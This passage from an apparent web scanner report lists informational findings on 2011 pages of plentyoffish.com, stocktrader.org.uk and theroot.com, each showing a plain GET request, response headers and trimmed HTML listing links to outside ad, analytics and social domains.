...[SNIP]...

17.384. http://www.plentyoffish.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.plentyoffish.com
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://www.plentyoffish.com/?SID=enhftrh2rwh40ylxbcdqkhlw

The response contains the following links to other domains:

http://ads.pof.com/
http://www.evow.com/
http://www.googleadservices.com/pagead/conversion.js
http://www.googleadservices.com/pagead/conversion/1072269077/?label=aKzaCNuLvQEQlY6m_wM&guid=ON&script=0

Request

GET /?SID=enhftrh2rwh40ylxbcdqkhlw HTTP/1.1
Host: www.plentyoffish.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmx=9489908.00012890560422417014:1:0-1-1-0; my_ipcountry=1; __utmxx=9489908.00012890560422417014:3738630:2592000; __utmz=9489908.1296523584.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmx_k_210735692=1; __utma=9489908.1831818404.1296523584.1296523584.1296523584.1; ft=Monday, January 31, 2011 5:25:37 PM; __utmc=9489908; __utmb=9489908.5.10.1296523584; ASP.NET_SessionId=enhftrh2rwh40ylxbcdqkhlw;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 01 Feb 2011 01:29:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 41183

<html><head><title>
Free Online Dating at Plentyoffish.com™</title>
<META HTTP-EQUIV="Content-Language" CONTENT="EN">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1
...[SNIP]...
</a> | <a href='http://www.evow.com'>Online Dating at eVow</a> | <a href='http://ads.pof.com'>Advertise Here</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/1072269077/?label=aKzaCNuLvQEQlY6m_wM&guid=ON&script=0"/>
</div>
...[SNIP]...

17.385. http://www.plentyoffish.com/siteopt.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.plentyoffish.com
Path:	/siteopt.js

Issue detail

The page was loaded from a URL containing a query string:

http://www.plentyoffish.com/siteopt.js?v=1&utmxkey=

The response contains the following link to another domain:

http://go.microsoft.com/fwlink/?linkid=8180

Request

GET /siteopt.js?v=1&utmxkey= HTTP/1.1
Host: www.plentyoffish.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmx=9489908.00012890560422417014:1:0-1-1-0; my_ipcountry=1; __utmxx=9489908.00012890560422417014:3738630:2592000; __utmz=9489908.1296523584.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmx_k_210735692=1; __utma=9489908.1831818404.1296523584.1296523584.1296523584.1; ft=Monday, January 31, 2011 5:25:37 PM; __utmc=9489908; __utmb=9489908.5.10.1296523584; ASP.NET_SessionId=enhftrh2rwh40ylxbcdqkhlw;

Response

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 01 Feb 2011 01:33:45 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; cha
...[SNIP]...
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a>
...[SNIP]...

17.386. http://www.stocktrader.org.uk/remote2/ST1-2.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.stocktrader.org.uk
Path:	/remote2/ST1-2.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.stocktrader.org.uk/remote2/ST1-2.php?ws=http://www.ligattsecurity.com/&wt=10000000000000000&w=200&h=250&bgc=11175E&tf=tahoma&tfs=17&tc=ffffff&tbc=11175E&f=tahoma&fc=ffffff&fs=11&tz=-5&cw=LGTT.PK&c=US

The response contains the following link to another domain:

http://www.google.com/jsapi

Request

GET /remote2/ST1-2.php?ws=http://www.ligattsecurity.com/&wt=10000000000000000&w=200&h=250&bgc=11175E&tf=tahoma&tfs=17&tc=ffffff&tbc=11175E&f=tahoma&fc=ffffff&fs=11&tz=-5&cw=LGTT.PK&c=US HTTP/1.1
Host: www.stocktrader.org.uk
Proxy-Connection: keep-alive
Referer: http://www.ligattsecurity.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:35:54 GMT
Server: Apache/2.0.63 (CentOS)
X-Powered-By: PHP/5.1.6
Refresh: 300; URL=
Content-Length: 2562
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
   <head>
       <title
...[SNIP]...
</title>
       <script src="http://www.google.com/jsapi"></script>
...[SNIP]...

17.387. http://www.theroot.com/multimedia/50-years-black-history previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.theroot.com
Path:	/multimedia/50-years-black-history

Issue detail

The page was loaded from a URL containing a query string:

http://www.theroot.com/multimedia/50-years-black-history?gt1=38002

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/jqueryui/1.6/jquery-ui.min.js
http://bunsen.wapolabs.com/identity/1.2.1/js/wapo_site_bottom.js
http://bunsen.wapolabs.com/identity/theroot/prod/1.2.1/js/wapo_identity.js
http://d.yimg.com/ds/badge2.js
http://downloads.mailchimp.com/js/jquery.form.js
http://downloads.mailchimp.com/js/jquery.validate.js
http://edge.quantserve.com/quant.js
http://feeds.feedburner.com/TheRootRssFeed
http://js-kit.com/comments-count.js
http://js.adsonar.com/js/adsonar.js
http://media.washingtonpost.com/wp-adv/dm/nw/dm_client.js
http://media.washingtonpost.com/wp-srv/ad/root_ad.js
http://media.washingtonpost.com/wp-srv/ad/wpni_generic_ad.js
http://media3.washingtonpost.com/wp-srv/wapolabs/revplat/prod/1_4_1/js/
http://pixel.quantserve.com/pixel/p-5cYn7dCzvaeyA.gif
http://www.blackpast.org/?q=aah/steele-michael-s-1958-0
http://www.digg.com/submit?url=http://www.theroot.com/multimedia/50-years-black-history&title=50+Years+of+Black+History%3A+A+Time+Line&media=news&topic=arts_culturetarget=
http://www.facebook.com/plugins/activity.php?site=www.theroot.com&width=306&height=600&header=false&border_color=white&font=arial&colorscheme=light&recommendations=true
http://www.facebook.com/plugins/like.php?api_key=2af8520b23bac95db13de0c7e5748525&href=http://www.theroot.com/multimedia/50-years-black-history&layout=standard&show_faces=false&width=400&action=like&font=verdana&colorscheme=light&height=50
http://www.facebook.com/plugins/likebox.php?id=26423400230&width=240&connections=0&stream=false&header=false&height=60
http://www.facebook.com/share.php
http://www.facebook.com/theroot
http://www.google.com/bookmarks/mark?op=edit&bkmk=http://www.theroot.com/multimedia/50-years-black-history&title=50 Years of Black History: A Time Line
http://www.justice.gov/ag/
http://www.myspace.com/index.cfm?fuseaction=postto&t=50 Years of Black History: A Time Line&u=http://www.theroot.com/multimedia/50-years-black-history
http://www.stumbleupon.com/submit?url=http://www.theroot.com/multimedia/50-years-black-history&title=50 Years of Black History: A Time Line
http://www.twitter.com/home?status=Check+this+out:+50+Years+of+Black+History%3A+A+Time+Line+http://wapo.st/5VIPzw
http://www.twitter.com/theroot247
http://www.washingtonpost.com/wp-adv/mediacenter/html/about_welcome.html
http://www.washingtonpost.com/wp-adv/mediacenter/html/ad_theroot.html
https://www.amazon.com/dp/B000056HEH?tag=root04c-20&camp=213381&creative=390973&linkCode=as4&creativeASIN=B000056HEH&adid=1QG0PVM4YMS9HWPS5KED&
https://www.amazon.com/dp/B00006SFKF?tag=root04c-20&camp=213381&creative=390973&linkCode=as4&creativeASIN=B00006SFKF&adid=0DB074BX56HWV12XDT6B&
https://www.amazon.com/dp/B000P0J092?tag=root04c-20&camp=213381&creative=390973&linkCode=as4&creativeASIN=B000P0J092&adid=1HXR2K5GBF0JGC43G5MM&
https://www.amazon.com/dp/B001CIOCHQ?tag=root04c-20&camp=213381&creative=390973&linkCode=as4&creativeASIN=B001CIOCHQ&adid=0FTWAEPHT6GVXYTAZVD9&

Request

GET /multimedia/50-years-black-history?gt1=38002 HTTP/1.1
Host: www.theroot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix)
Last-Modified: Wed, 02 Feb 2011 16:17:24 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Wed, 02 Feb 2011 16:17:26 GMT
Date: Wed, 02 Feb 2011 16:17:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 95960

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<meta name="
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.6/jquery-ui.min.js"></script>
...[SNIP]...
</script>
<script language="javascript" type="text/javascript" src="http://media.washingtonpost.com/wp-srv/ad/wpni_generic_ad.js"></script>
<script language="javascript" type="text/javascript" src="http://media.washingtonpost.com/wp-srv/ad/root_ad.js"></script>
<script language="javascript" type="text/javascript" src="http://media.washingtonpost.com/wp-adv/dm/nw/dm_client.js"></script>
<script type="text/javascript" src="http://bunsen.wapolabs.com/identity/theroot/prod/1.2.1/js/wapo_identity.js"></script>
...[SNIP]...
<li>
<a href="http://feeds.feedburner.com/TheRootRssFeed">rss</a>
...[SNIP]...
<div class="options-row1"><a class="share-link" href="http://www.facebook.com/share.php" onclick="return fbs_click('http://www.theroot.com/multimedia/50-years-black-history','50 Years of Black History: A Time Line')"target="_blank"><span class="share-link-wrapper">
...[SNIP]...
</a><a target="_blank" class="share-link" href="http://www.digg.com/submit?url=http://www.theroot.com/multimedia/50-years-black-history&title=50+Years+of+Black+History%3A+A+Time+Line&media=news&topic=arts_culturetarget="_blank" onclick=""><span class="share-link-wrapper">
...[SNIP]...
</a><a class="share-link" href="http://www.twitter.com/home?status=Check+this+out:+50+Years+of+Black+History%3A+A+Time+Line+http://wapo.st/5VIPzw" target="_blank"><span class="share-link-wrapper">
...[SNIP]...
</a><script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text">http://www.theroot.com/multimedia/50-years-black-history</script><a class="share-link" target="_blank" href="http://www.myspace.com/index.cfm?fuseaction=postto&t=50 Years of Black History: A Time Line&u=http://www.theroot.com/multimedia/50-years-black-history"><span class="share-link-wrapper">
...[SNIP]...
<div class="options-row2"><a class="share-link" target="_blank" href="http://www.stumbleupon.com/submit?url=http://www.theroot.com/multimedia/50-years-black-history&title=50 Years of Black History: A Time Line"><span class="share-link-wrapper">
...[SNIP]...
</a><a class="share-link" target="_blank" title="Google" href="http://www.google.com/bookmarks/mark?op=edit&bkmk=http://www.theroot.com/multimedia/50-years-black-history&title=50 Years of Black History: A Time Line" rel="nofollow"><span class="share-link-wrapper">
...[SNIP]...
<div style="padding-left:5px;"><iframe src="http://www.facebook.com/plugins/like.php?api_key=2af8520b23bac95db13de0c7e5748525&href=http://www.theroot.com/multimedia/50-years-black-history&layout=standard&show_faces=false&width=400&action=like&font=verdana&colorscheme=light&height=50" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:400px; height:50px;" allowTransparency="true"></iframe>
...[SNIP]...
<p>Sidney Poitier wins best actor for <a href="https://www.amazon.com/dp/B000056HEH?tag=root04c-20&camp=213381&creative=390973&linkCode=as4&creativeASIN=B000056HEH&adid=1QG0PVM4YMS9HWPS5KED&" target="_blank"><em>
...[SNIP]...
<p>April 12: Harold Washington elected mayor of Chicago; Alice Walker's <a href="https://www.amazon.com/dp/B000P0J092?tag=root04c-20&camp=213381&creative=390973&linkCode=as4&creativeASIN=B000P0J092&adid=1HXR2K5GBF0JGC43G5MM&" target="_blank"><em>
...[SNIP]...
<p>Feb. 11, Nelson Mandela is freed after 27 years in prison; August Wilson wins Pulitzer Prize for <a target="_blank" href="https://www.amazon.com/dp/B00006SFKF?tag=root04c-20&camp=213381&creative=390973&linkCode=as4&creativeASIN=B00006SFKF&adid=0DB074BX56HWV12XDT6B&"><i>
...[SNIP]...
<p>April 30, <a target="_blank" href="https://www.amazon.com/dp/B001CIOCHQ?tag=root04c-20&camp=213381&creative=390973&linkCode=as4&creativeASIN=B001CIOCHQ&adid=0FTWAEPHT6GVXYTAZVD9&"><i>
...[SNIP]...
<p>Jan. 30: Former Maryland Lt. Gov. <a href="http://www.blackpast.org/?q=aah/steele-michael-s-1958-0">Michael S. Steele</a>
...[SNIP]...
<p>Feb. 2: The U.S. Senate confirms, with a vote of 75 to 21, <a href="http://www.justice.gov/ag/">Eric H. Holder Jr.</a>
...[SNIP]...
<div class="content">
<script src="http://downloads.mailchimp.com/js/jquery.validate.js" type="text/javascript"></script>
<script src="http://downloads.mailchimp.com/js/jquery.form.js" type="text/javascript"></script>
...[SNIP]...
<div class="theroot_mc_signup_link"><a href="http://www.twitter.com/theroot247" target="_blank" title="Follow us on Twitter"><img alt="Twitter" src="/sites/all/modules/theroot_mailchimp/images/twitter.png">
...[SNIP]...
<div class="theroot_mc_signup_link"><a href="http://www.facebook.com/theroot" target="_blank" title="Like us on Facebook"><img alt="Facebook" src="/sites/all/modules/theroot_mailchimp/images/facebook.png"</a>
...[SNIP]...
<div class="theroot_mc_signup_link"><a href="http://feeds.feedburner.com/TheRootRssFeed" target="_blank" title="Subscribe to our Feed"><img alt="Feed" src="/sites/all/modules/theroot_mailchimp/images/feed.png">
...[SNIP]...
<div style="width: 308px; border-bottom: 1px solid rgb(103, 113, 42); margin-left: 6px;">
   <iframe scrolling="no"
                   frameborder="0" allowtransparency="true" style="border: medium none; overflow: hidden; width: 240px; height: 60px; margin-left: 52px;"
                   src="http://www.facebook.com/plugins/likebox.php?id=26423400230&width=240&connections=0&stream=false&header=false&height=60">
   </iframe>
</div>
<div style="width: 336px; height: 183px; overflow-x: hidden; overflow-y: scroll;">
   <iframe scrolling="no"
                   frameborder="0"
                   allowtransparency="true"
                   style="border: medium none; overflow: hidden; width: 306px; height: 600px; margin-left: 14px;"
                   src="http://www.facebook.com/plugins/activity.php?site=www.theroot.com&width=306&height=600&header=false&border_color=white&font=arial&colorscheme=light&recommendations=true">
   </iframe>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://media3.washingtonpost.com/wp-srv/wapolabs/revplat/prod/1_4_1/js/
rev_platform_ads.min.js"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</a> :: <a class="rss" href="http://feeds.feedburner.com/TheRootRssFeed">rss feed</a>
...[SNIP]...
</span>
   <a href="http://www.washingtonpost.com/wp-adv/mediacenter/html/ad_theroot.html" target="_blank">Advertising</a>
...[SNIP]...
<div id="footerRow3">
   <a href="http://www.washingtonpost.com/wp-adv/mediacenter/html/about_welcome.html">© 1996-2011 The Washington Post Company</a>
...[SNIP]...
</script>
       <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
       <noscript>
       <img src="http://pixel.quantserve.com/pixel/p-5cYn7dCzvaeyA.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
       </noscript>
...[SNIP]...
</script>
<script src="http://js-kit.com/comments-count.js"></script>

<script type="text/javascript" src="http://bunsen.wapolabs.com/identity/1.2.1/js/wapo_site_bottom.js"></script>
...[SNIP]...

17.388. http://www.theroot.com/views/2011/young-futurists previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.theroot.com
Path:	/views/2011/young-futurists

Issue detail

The page was loaded from a URL containing a query string:

http://www.theroot.com/views/2011/young-futurists?gt1=38002

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/jqueryui/1.6/jquery-ui.min.js
http://astrocenter.astrology.msn.com/
http://astrocenter.astrology.msn.com/msn/DeptHoroscope.aspx?When=0&Af=-1000&VS
http://autos.msn.com/
http://blstc.msn.com/br/gbl/css/10/decoration/logo_sm_msn_rev24.png
http://blstj.msn.com/br/gbl/js/2/report.js
http://blstj.msn.com/br/gbl/js/4/mozcompat.js
http://blstj.msn.com/br/gbl/js/7/core.js
http://blstj.msn.com/br/gbl/js/7/navigation.js
http://blstj.msn.com/br/om/js/s_code.js
http://bunsen.wapolabs.com/identity/1.2.1/js/wapo_site_bottom.js
http://bunsen.wapolabs.com/identity/theroot/prod/1.2.1/js/wapo_identity.js
http://careers.msn.com/
http://d.yimg.com/ds/badge2.js
http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670268
http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670269
http://download.live.com/?sku=messenger
http://downloads.mailchimp.com/js/jquery.form.js
http://downloads.mailchimp.com/js/jquery.validate.js
http://edge.quantserve.com/quant.js
http://entertainment.msn.com/
http://entertainment.msn.com/news/?ipp=15
http://entertainment.msn.com/video/?from=en-us_msnhp
http://feeds.feedburner.com/TheRootRssFeed
http://fitbie.msn.com/
http://games.msn.com/
http://glo.msn.com/
http://health.msn.com/
http://hotmail.msn.com/
http://hp.msn.com/scr/op/ol-fdbkv3_r1.js
http://insidemsn.wordpress.com/
http://investing.money.msn.com/investments/stock-price
http://js-kit.com/comments-count.js
http://js.adsonar.com/js/adsonar.js
http://lifestyle.msn.com/
http://lifestyle.msn.com/relationships/
http://lifestyle.msn.com/your-home/
http://lifestyle.msn.com/your-look/
http://lifestyle.msn.com/your-look/video/?from=en-us_msnhp
http://local.msn.com/news.aspx
http://local.msn.com/weather.aspx
http://media.washingtonpost.com/wp-adv/dm/nw/dm_client.js
http://media.washingtonpost.com/wp-srv/ad/root_ad.js
http://media.washingtonpost.com/wp-srv/ad/wpni_generic_ad.js
http://media3.washingtonpost.com/wp-srv/wapolabs/revplat/prod/1_4_1/js/
http://money.msn.com/
http://money.msn.com/investing
http://money.msn.com/money-video
http://money.msn.com/personal-finance
http://movies.msn.com/
http://movies.msn.com/new-on-dvd/movies/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportalspecials.112.2o7.net/b/ss/msnportalspecials/1/H.1--NS/0
http://music.msn.com/
http://my.msn.com/
http://pixel.quantserve.com/pixel/p-5cYn7dCzvaeyA.gif
http://realestate.msn.com/
http://specials.msn.com/alphabet.aspx
http://thebubble.msn.com/
http://today.msnbc.msn.com/
http://tv.msn.com/
http://wonderwall.msn.com/
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search?FORM=AI
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.delish.com/
http://www.digg.com/submit?url=http://www.theroot.com/views/2011/young-futurists&title=The+Root%5C%27s+Young+Futurists+List+of+25+Innovators&media=news&topic=arts_culturetarget=
http://www.facebook.com/plugins/activity.php?site=www.theroot.com&width=306&height=600&header=false&border_color=white&font=arial&colorscheme=light&recommendations=true
http://www.facebook.com/plugins/like.php?api_key=2af8520b23bac95db13de0c7e5748525&href=http://www.theroot.com/views/2011/young-futurists&layout=standard&show_faces=false&width=400&action=like&font=verdana&colorscheme=light&height=50
http://www.facebook.com/plugins/like.php?api_key=2af8520b23bac95db13de0c7e5748525&href=http://www.theroot.com/views/2011/young-futurists&layout=standard&show_faces=false&width=450&action=like&font=verdana&colorscheme=light&height=50
http://www.facebook.com/plugins/likebox.php?id=26423400230&width=240&connections=0&stream=false&header=false&height=60
http://www.facebook.com/share.php
http://www.facebook.com/theroot
http://www.google.com/bookmarks/mark?op=edit&bkmk=http://www.theroot.com/root-100/2010/janelle-mon-e&title=The Root\'s Young Futurists List of 25 Innovators
http://www.google.com/bookmarks/mark?op=edit&bkmk=http://www.theroot.com/views/2011/young-futurists&title=The Root\'s Young Futurists List of 25 Innovators
http://www.msn.com/
http://www.msnbc.msn.com/
http://www.msnbc.msn.com/id/3032072/ns/business
http://www.msnbc.msn.com/id/3032076/ns/health
http://www.msnbc.msn.com/id/3032118/ns/technology_and_science
http://www.msnbc.msn.com/id/3032507/ns/world_news
http://www.msnbc.msn.com/id/3032525/ns/us_news
http://www.msnbc.msn.com/id/3032553/ns/politics
http://www.msnbc.msn.com/id/3032619/ns/nightly_news/
http://www.msnbc.msn.com/id/8004316/?from=en-us_msnhp
http://www.myspace.com/index.cfm?fuseaction=postto&t=The Root\'s Young Futurists List of 25 Innovators&u=http://www.theroot.com/views/2011/young-futurists
http://www.stumbleupon.com/submit?url=http://www.theroot.com/views/2011/young-futurists&title=The Root\'s Young Futurists List of 25 Innovators
http://www.twitter.com/home?status=Check+this+out:+The+Root%27s+Young+Futurists+List+of+25+Innovators+http://wapo.st/f9HHCs
http://www.twitter.com/theroot247
http://www.washingtonpost.com/wp-adv/mediacenter/html/about_welcome.html
http://www.washingtonpost.com/wp-adv/mediacenter/html/ad_theroot.html
http://yellowpages.msn.com/
http://zone.msn.com/en-us/home
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /views/2011/young-futurists?gt1=38002 HTTP/1.1
Host: www.theroot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix)
Last-Modified: Wed, 02 Feb 2011 16:16:46 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Wed, 02 Feb 2011 16:17:24 GMT
Date: Wed, 02 Feb 2011 16:17:24 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 72016

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<meta name="
...[SNIP]...

       <script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/4/mozcompat.js"></script>
   
   <script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/core.js"></script>
   <script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/2/report.js"></script>
   <script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/navigation.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.6/jquery-ui.min.js"></script>
...[SNIP]...
</script>
<script language="javascript" type="text/javascript" src="http://media.washingtonpost.com/wp-srv/ad/wpni_generic_ad.js"></script>
<script language="javascript" type="text/javascript" src="http://media.washingtonpost.com/wp-srv/ad/root_ad.js"></script>
<script language="javascript" type="text/javascript" src="http://media.washingtonpost.com/wp-adv/dm/nw/dm_client.js"></script>
<script type="text/javascript" src="http://bunsen.wapolabs.com/identity/theroot/prod/1.2.1/js/wapo_identity.js"></script>
...[SNIP]...
</script>
       <script type="text/javascript" src="http://blstj.msn.com/br/om/js/s_code.js"></script>
...[SNIP]...
<div><img src="http://msnportalspecials.112.2O7.net/b/ss/msnportalspecials/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
</div>
   <script type="text/javascript" src="http://hp.msn.com/scr/op/ol-fdbkv3_r1.js"></script>
...[SNIP]...
<span class="msnlogo_top">
                   <a href="http://www.msn.com">
                       <img id="msnlogo" src="http://blstc.msn.com/br/gbl/css/10/decoration/logo_sm_msn_rev24.png" title="go to MSN.com" alt="go to MSN.com" /></a>
...[SNIP]...
<li class="c1"><a href="http://www.msnbc.msn.com/">News</a>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a></li><li><a href="http://www.msnbc.msn.com/id/3032076/ns/health">Health News</a>
...[SNIP]...
<li><a href="http://local.msn.com/news.aspx"><strong>
...[SNIP]...
<li><a href="http://www.msnbc.msn.com/id/3032619/ns/nightly_news/">NBC Nightly News</a>
...[SNIP]...
<li><a href="http://www.msnbc.msn.com/id/3032553/ns/politics">Politics</a></li><li><a href="http://www.msnbc.msn.com/id/3032118/ns/technology_and_science">Tech & Science</a>
...[SNIP]...
<li><a href="http://today.msnbc.msn.com/">Today Show</a></li><li><a href="http://www.msnbc.msn.com/id/3032525/ns/us_news">US News</a></li><li><a href="http://www.msnbc.msn.com/id/8004316/?from=en-us_msnhp">Video</a></li><li><a href="http://local.msn.com/weather.aspx">Weather</a></li><li><a href="http://www.msnbc.msn.com/id/3032507/ns/world_news">World News</a>
...[SNIP]...
<li class="c2"><a href="http://entertainment.msn.com/">Entertainment</a>
...[SNIP]...
<li class="first"><a href="http://wonderwall.msn.com/"><strong>
...[SNIP]...
<li><a href="http://thebubble.msn.com/ ">Comedy</a></li><li><a href="http://entertainment.msn.com/news/?ipp=15">Entertainment News </a>
...[SNIP]...
<li><a href="http://zone.msn.com/en-us/home">Games</a></li><li><a href="http://movies.msn.com/">Movies</a></li><li><a href="http://music.msn.com/">Music</a></li><li><a href="http://movies.msn.com/new-on-dvd/movies/">New on DVD</a></li><li><a href="http://tv.msn.com/"> TV</a></li><li><a href="http://entertainment.msn.com/video/?from=en-us_msnhp"> Video</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li class="c4"><a href="http://money.msn.com/">Money</a>
...[SNIP]...
<li class="first"><a href="http://autos.msn.com/">Autos</a></li><li><a href="http://www.msnbc.msn.com/id/3032072/ns/business">Business News</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://money.msn.com/investing">Investing</a></li><li><a href="http://money.msn.com/personal-finance">Personal Finance</a>
...[SNIP]...
<li><a href="http://investing.money.msn.com/investments/stock-price"><strong>
...[SNIP]...
<li><a href="http://realestate.msn.com/">Real Estate & Rentals</a>
...[SNIP]...
<li><a href="http://money.msn.com/money-video">Video</a>
...[SNIP]...
<li class="c5"><a href="http://lifestyle.msn.com/">Lifestyle</a>
...[SNIP]...
<li class="first"><a href="http://lifestyle.msn.com/your-look/">Beauty & Fashion</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a></li><li><a href="http://lifestyle.msn.com/your-home/">Decor & Organizing</a>
...[SNIP]...
<li><a href="http://fitbie.msn.com">Fitbie</a></li><li><a href="http://glo.msn.com/">Glo: For Her</a>
...[SNIP]...
<li><a href="http://health.msn.com/">Health</a></li><li><a href="http://astrocenter.astrology.msn.com/msn/DeptHoroscope.aspx?When=0&Af=-1000&VS">Horoscopes</a></li><li><a href="http://lifestyle.msn.com/relationships/">Love & Relationships</a>
...[SNIP]...
<li><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670269"><strong>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a></li><li><a href="http://lifestyle.msn.com/your-look/video/?from=en-us_msnhp">Video</a>
...[SNIP]...
<li class="c6 last fluid"><a href="http://specials.msn.com/alphabet.aspx">More</a>
...[SNIP]...
<li class="first"><a href="http://autos.msn.com/">Autos</a></li><li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a></li><li><a href="http://careers.msn.com/">Careers & Jobs</a>
...[SNIP]...
